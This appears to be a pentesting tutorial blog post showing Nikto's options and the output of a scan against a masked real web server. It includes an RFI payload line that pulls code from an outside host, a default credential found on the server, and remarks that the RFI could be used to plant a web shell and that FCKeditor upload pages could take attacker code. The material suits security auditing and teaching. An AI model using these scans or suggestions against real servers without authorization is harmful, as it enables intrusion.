Pentesting Web Servers with Nikto in Backtrack and Kali Linux

Nikto is one of the most popular web security application when you are beginning a web pentesting project.

You can download Nikto from http://cirt.net/nikto2 This tool has been included in Backtrack and Kali Linux distributions.

Nikto is an Open Source web server scanner. This tool performs test against web servers making requests for multiple items. Nikto checks:


  • Over 6500 dangerous files/CGIs.
  • More than 1250 outdated version for several web servers.
  • Specific problems on over 270 servers.
  • Presence of index files.
  • HTTP server options like TRACE.
  • Installed software and web servers.


 

 Nikto creates a lot of requests quickly, is not designed as an overly stealthy tool. If you run Nikto against a remote Web Server, the administrator could read a lot of lines on web server log which show the attack. Some SIEMs have defaults rules for correlating these logs and it could create an alarm warning to the administrators about the attack.

These are the Nikto options.
jnieto@naltor:~$ nikto 
Option host requires an argument

-config+ Use this config file
-Cgidirs+ scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
-dbcheck check database and other key files for syntax errors
-Display+ Turn on/off display outputs
-evasion+ ids evasion technique
-Format+ save file (-o) format
-host+ target host
-Help Extended help information
-id+ Host authentication to use, format is id:pass or id:pass:realm
-list-plugins List all available plugins
-mutate+ Guess additional file names
-mutate-options+ Provide extra information for mutations
-output+ Write output to this file
-nocache Disables the URI cache
-nossl Disables using SSL
-no404 Disables 404 checks
-port+ Port to use (default 80)
-Plugins+ List of plugins to run (default: ALL)
-root+ Prepend root value to all requests, format is /directory
-ssl Force ssl mode on port
-Single Single request mode
-timeout+ Timeout (default 2 seconds)
-Tuning+ Scan tuning
-update Update databases and plugins from CIRT.net
-vhost+ Virtual host (for Host header)
-Version Print plugin and database versions
+ requires a value

Note: This is the short help output. Use -H for full help.

We are going to run Nikto against a server.

jnieto@naltor:~$ nikto -h www.XxXxXxXxXx.es
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: XXX.XXX.XXX.XXX
+ Target Hostname: www.XxXxXxXxXx.es
+ Target Port: 80
+ Start Time: 2013-06-19 16:23:35
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Win32) PHP/5.3.1
+ Retrieved x-powered-by header: PHP/5.3.1
+ robots.txt contains 10 entries which should be manually viewed.
+ ETag header found on server, inode: 1688849860445366, size: 1028, mtime: 0x49b5cedbf3834
+ Multiple index files found: index.php, index.html,
+ PHP/5.3.1 appears to be outdated (current is at least 5.3.5)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Default account found for 'Acceso restringido a usuarios autorizados' at /webalizer/ (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_image.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_flash.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_link.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/frmupload.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/fckconfig.js: FCKeditor JavaScript file found.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/browser.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ 6448 items checked: 10 error(s) and 31 item(s) reported on remote host
+ End Time: 2013-06-19 16:27:19 (224 seconds)
---------------------------------------------------------------------------

As you can see, we have find out the Server and PHP versions and a lot of interesting folders.

We have discover a RFI (Remote File Include) on this server...
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

This URL path get a PHP code from http://cirt.net/rfiinc.txt? with the next code:

This code executes "phpinfo" but if you want, you can upload a web shell in order to gain access to the server.




Next line is interesting too. Nikto has located some URLs where you  could upload files with your own source code.

+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.



Nikto is one of the first applications that I run when a client request me a web audit.